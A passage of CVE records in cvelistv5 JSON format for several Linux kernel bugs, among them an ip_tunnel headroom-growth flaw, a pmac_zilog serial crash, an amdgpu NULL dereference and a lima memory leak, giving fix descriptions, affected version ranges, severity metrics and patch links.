__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\n netdev_start_xmit include/linux/netdevice.h:4954 [inline]\n xmit_one net/core/dev.c:3548 [inline]\n dev_hard_start_xmit+0x13d/0x6d0 net/core/dev.c:3564\n ...\n\nThe splat occurs because skb-\u003edata points past skb-\u003ehead allocated area.\nThis is because neigh layer does:\n __skb_pull(skb, skb_network_offset(skb));\n\n... but skb_network_offset() returns a negative offset and __skb_pull()\narg is unsigned. IOW, we skb-\u003edata gets \"adjusted\" by a huge value.\n\nThe negative value is returned because skb-\u003ehead and skb-\u003edata distance is\nmore than 64k and skb-\u003enetwork_header (u16) has wrapped around.\n\nThe bug is in the ip_tunnel infrastructure, which can cause\ndev-\u003eneeded_headroom to increment ad infinitum.\n\nThe syzkaller reproducer consists of packets getting routed via a gre\ntunnel, and route of gre encapsulated packets pointing at another (ipip)\ntunnel. The ipip encapsulation finds gre0 as next output device.\n\nThis results in the following pattern:\n\n1). First packet is to be sent out via gre0.\nRoute lookup found an output device, ipip0.\n\n2).\nip_tunnel_xmit for gre0 bumps gre0-\u003eneeded_headroom based on the future\noutput device, rt.dev-\u003eneeded_headroom (ipip0).\n\n3).\nip output / start_xmit moves skb on to ipip0. which runs the same\ncode path again (xmit recursion).\n\n4).\nRouting step for the post-gre0-encap packet finds gre0 as output device\nto use for ipip0 encapsulated packet.\n\ntunl0-\u003eneeded_headroom is then incremented based on the (already bumped)\ngre0 device headroom.\n\nThis repeats for every future packet:\n\ngre0-\u003eneeded_headroom gets inflated because previous packets\u0027 ipip0 step\nincremented rt-\u003edev (gre0) headroom, and ipip0 incremented because gre0\nneeded_headroom was increased.\n\nFor each subsequent packet, gre/ipip0-\u003eneeded_headroom grows until\npost-expand-head reallocations result in a skb-\u003ehead/data distance of\nmore than 64k.\n\nOnce that happens, skb-\u003enetwork_header (u16) wraps around when\npskb_expand_head tries to make sure that skb_network_offset() is unchanged\nafter the headroom expansion/reallocation.\n\nAfter this skb_network_offset(skb) returns a different (and negative)\nresult post headroom expansion.\n\nThe next trip to neigh layer (or anything else that would __skb_pull the\nnetwork header) makes skb-\u003edata point to a memory location outside\nskb-\u003ehead area.\n\nv2: Cap the needed_headroom update to an arbitarily chosen upperlimit to\nprevent perpetual increase instead of dropping the headroom increment\ncompletely."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:46.707Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f81e94d2dcd2397137edcb8b85f4c5bed5d22383"
},
{
"url": "https://git.kernel.org/stable/c/2e95350fe9db9d53c701075060ac8ac883b68aee"
},
{
"url": "https://git.kernel.org/stable/c/afec0c5cd2ed71ca95a8b36a5e6d03333bf34282"
},
{
"url": "https://git.kernel.org/stable/c/ab63de24ebea36fe73ac7121738595d704b66d96"
},
{
"url": "https://git.kernel.org/stable/c/a0a1db40b23e8ff86dea2786c5ea1470bb23ecb9"
},
{
"url": "https://git.kernel.org/stable/c/049d7989c67e8dd50f07a2096dbafdb41331fb9b"
},
{
"url": "https://git.kernel.org/stable/c/5ae1e9922bbdbaeb9cfbe91085ab75927488ac0f"
}
],
"title": "net: ip_tunnel: prevent perpetual headroom growth",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26804",
"datePublished": "2024-04-04T08:20:31.305Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T12:54:46.707Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26999 (GCVE-0-2024-26999)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial/pmac_zilog: Remove flawed mitigation for rx irq flood
The mitigation was intended to stop the irq completely. That may be
better than a hard lock-up but it turns out that you get a crash anyway
if you're using pmac_zilog as a serial console:
ttyPZ0: pmz: rx irq flood !
BUG: spinlock recursion on CPU#0, swapper/0
That's because the pr_err() call in pmz_receive_chars() results in
pmz_console_write() attempting to lock a spinlock already locked in
pmz_interrupt(). With CONFIG_DEBUG_SPINLOCK=y, this produces a fatal
BUG splat. The spinlock in question is the one in struct uart_port.
Even when it's not fatal, the serial port rx function ceases to work.
Also, the iteration limit doesn't play nicely with QEMU, as can be
seen in the bug report linked below.
A web search for other reports of the error message "pmz: rx irq flood"
didn't produce anything. So I don't think this code is needed any more.
Remove it.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:16:09.193Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69a02273e288011b521ee7c1f3ab2c23fda633ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d679c816929d62af51c8e6d7fc0e165c9412d2f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab86cf6f8d24e63e9aca23da5108af1aa5483928"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a3bbe41efa55323b6ea3c35fa15941d4dbecdef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bbaafbb4651fede8d3c3881601ecaa4f834f9d3f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52aaf1ff14622a04148dbb9ccce6d9de5d534ea7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1be3226445362bfbf461c92a5bcdb1723f2e4907"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26999",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:49.996253Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:39.040Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/pmac_zilog.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "69a02273e288011b521ee7c1f3ab2c23fda633ce",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d679c816929d62af51c8e6d7fc0e165c9412d2f3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ab86cf6f8d24e63e9aca23da5108af1aa5483928",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7a3bbe41efa55323b6ea3c35fa15941d4dbecdef",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bbaafbb4651fede8d3c3881601ecaa4f834f9d3f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "52aaf1ff14622a04148dbb9ccce6d9de5d534ea7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1be3226445362bfbf461c92a5bcdb1723f2e4907",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/pmac_zilog.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial/pmac_zilog: Remove flawed mitigation for rx irq flood\n\nThe mitigation was intended to stop the irq completely. That may be\nbetter than a hard lock-up but it turns out that you get a crash anyway\nif you\u0027re using pmac_zilog as a serial console:\n\nttyPZ0: pmz: rx irq flood !\nBUG: spinlock recursion on CPU#0, swapper/0\n\nThat\u0027s because the pr_err() call in pmz_receive_chars() results in\npmz_console_write() attempting to lock a spinlock already locked in\npmz_interrupt(). With CONFIG_DEBUG_SPINLOCK=y, this produces a fatal\nBUG splat. The spinlock in question is the one in struct uart_port.\n\nEven when it\u0027s not fatal, the serial port rx function ceases to work.\nAlso, the iteration limit doesn\u0027t play nicely with QEMU, as can be\nseen in the bug report linked below.\n\nA web search for other reports of the error message \"pmz: rx irq flood\"\ndidn\u0027t produce anything. So I don\u0027t think this code is needed any more.\nRemove it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:50.540Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/69a02273e288011b521ee7c1f3ab2c23fda633ce"
},
{
"url": "https://git.kernel.org/stable/c/d679c816929d62af51c8e6d7fc0e165c9412d2f3"
},
{
"url": "https://git.kernel.org/stable/c/ab86cf6f8d24e63e9aca23da5108af1aa5483928"
},
{
"url": "https://git.kernel.org/stable/c/7a3bbe41efa55323b6ea3c35fa15941d4dbecdef"
},
{
"url": "https://git.kernel.org/stable/c/bbaafbb4651fede8d3c3881601ecaa4f834f9d3f"
},
{
"url": "https://git.kernel.org/stable/c/52aaf1ff14622a04148dbb9ccce6d9de5d534ea7"
},
{
"url": "https://git.kernel.org/stable/c/ca09dfc3cfdf89e6af3ac24e1c6c0be5c575a729"
},
{
"url": "https://git.kernel.org/stable/c/1be3226445362bfbf461c92a5bcdb1723f2e4907"
}
],
"title": "serial/pmac_zilog: Remove flawed mitigation for rx irq flood",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26999",
"datePublished": "2024-05-01T05:28:30.760Z",
"dateReserved": "2024-02-19T14:20:24.206Z",
"dateUpdated": "2025-11-04T17:16:09.193Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52585 (GCVE-0-2023-52585)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-09-16 08:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fix possible NULL dereference in amdgpu_ras_query_error_status_helper()
Return invalid error code -EINVAL for invalid block id.
Fixes the below:
drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c:1183 amdgpu_ras_query_error_status_helper() error: we previously assumed 'info' could be null (see line 1176)
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-52585",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T15:58:01.323059Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T16:09:44.599Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:56.000Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/467139546f3fb93913de064461b1a43a212d7626"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0eb296233f86750102aa43b97879b8d8311f249a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e6d6f27522bcd037856234b720ff607b9c4a09b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92cb363d16ac1e41c9764cdb513d0e89a6ff4915"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c364e7a34c85c2154fb2e47561965d5b5a0b69b1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/195a6289282e039024ad30ba66e6f94a4d0fbe49"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8d55a90fd55b767c25687747e2b24abd1ef8680"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0009/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "467139546f3fb93913de064461b1a43a212d7626",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "0eb296233f86750102aa43b97879b8d8311f249a",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "7e6d6f27522bcd037856234b720ff607b9c4a09b",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "92cb363d16ac1e41c9764cdb513d0e89a6ff4915",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "c364e7a34c85c2154fb2e47561965d5b5a0b69b1",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "195a6289282e039024ad30ba66e6f94a4d0fbe49",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "b8d55a90fd55b767c25687747e2b24abd1ef8680",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_ras.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.277",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.218",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.92",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.32",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.277",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.218",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.160",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.92",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.32",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix possible NULL dereference in amdgpu_ras_query_error_status_helper()\n\nReturn invalid error code -EINVAL for invalid block id.\n\nFixes the below:\n\ndrivers/gpu/drm/amd/amdgpu/amdgpu_ras.c:1183 amdgpu_ras_query_error_status_helper() error: we previously assumed \u0027info\u0027 could be null (see line 1176)"
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T08:02:10.900Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/467139546f3fb93913de064461b1a43a212d7626"
},
{
"url": "https://git.kernel.org/stable/c/0eb296233f86750102aa43b97879b8d8311f249a"
},
{
"url": "https://git.kernel.org/stable/c/7e6d6f27522bcd037856234b720ff607b9c4a09b"
},
{
"url": "https://git.kernel.org/stable/c/92cb363d16ac1e41c9764cdb513d0e89a6ff4915"
},
{
"url": "https://git.kernel.org/stable/c/c364e7a34c85c2154fb2e47561965d5b5a0b69b1"
},
{
"url": "https://git.kernel.org/stable/c/195a6289282e039024ad30ba66e6f94a4d0fbe49"
},
{
"url": "https://git.kernel.org/stable/c/b8d55a90fd55b767c25687747e2b24abd1ef8680"
}
],
"title": "drm/amdgpu: Fix possible NULL dereference in amdgpu_ras_query_error_status_helper()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52585",
"datePublished": "2024-03-06T06:45:20.389Z",
"dateReserved": "2024-03-02T21:55:42.570Z",
"dateUpdated": "2025-09-16T08:02:10.900Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35829 (GCVE-0-2024-35829)
Vulnerability from cvelistv5
Published
2024-05-17 13:41
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/lima: fix a memleak in lima_heap_alloc
When lima_vm_map_bo fails, the resources need to be deallocated, or
there will be memleaks.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 Version: 6aebc51d7aeff5a30d86485f320f0c871b5f23a4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35829",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-23T21:44:50.496418Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-401",
"description": "CWE-401 Missing Release of Memory after Effective Lifetime",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-23T21:46:27.559Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2e80ac9344aebbff576453d5c0290b332e187ed"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/746606d37d662c70ae1379fc658ee9c65f06880f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6d51a91b41704704e395de6839c667b0f810bbf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e25c0ee5665e8a768b8e21445db1f86e9156eb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ab14eccf5578af1dd5668a5f2d771df27683cab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec6bb037e4a35fcbb5cd7bc78242d034ed893fcd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04ae3eb470e52a3c41babe85ff8cee195e4dcbea"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/lima/lima_gem.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f2e80ac9344aebbff576453d5c0290b332e187ed",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "746606d37d662c70ae1379fc658ee9c65f06880f",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "f6d51a91b41704704e395de6839c667b0f810bbf",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "8e25c0ee5665e8a768b8e21445db1f86e9156eb7",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "4ab14eccf5578af1dd5668a5f2d771df27683cab",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "ec6bb037e4a35fcbb5cd7bc78242d034ed893fcd",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
},
{
"lessThan": "04ae3eb470e52a3c41babe85ff8cee195e4dcbea",
"status": "affected",
"version": "6aebc51d7aeff5a30d86485f320f0c871b5f23a4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/lima/lima_gem.c"
],
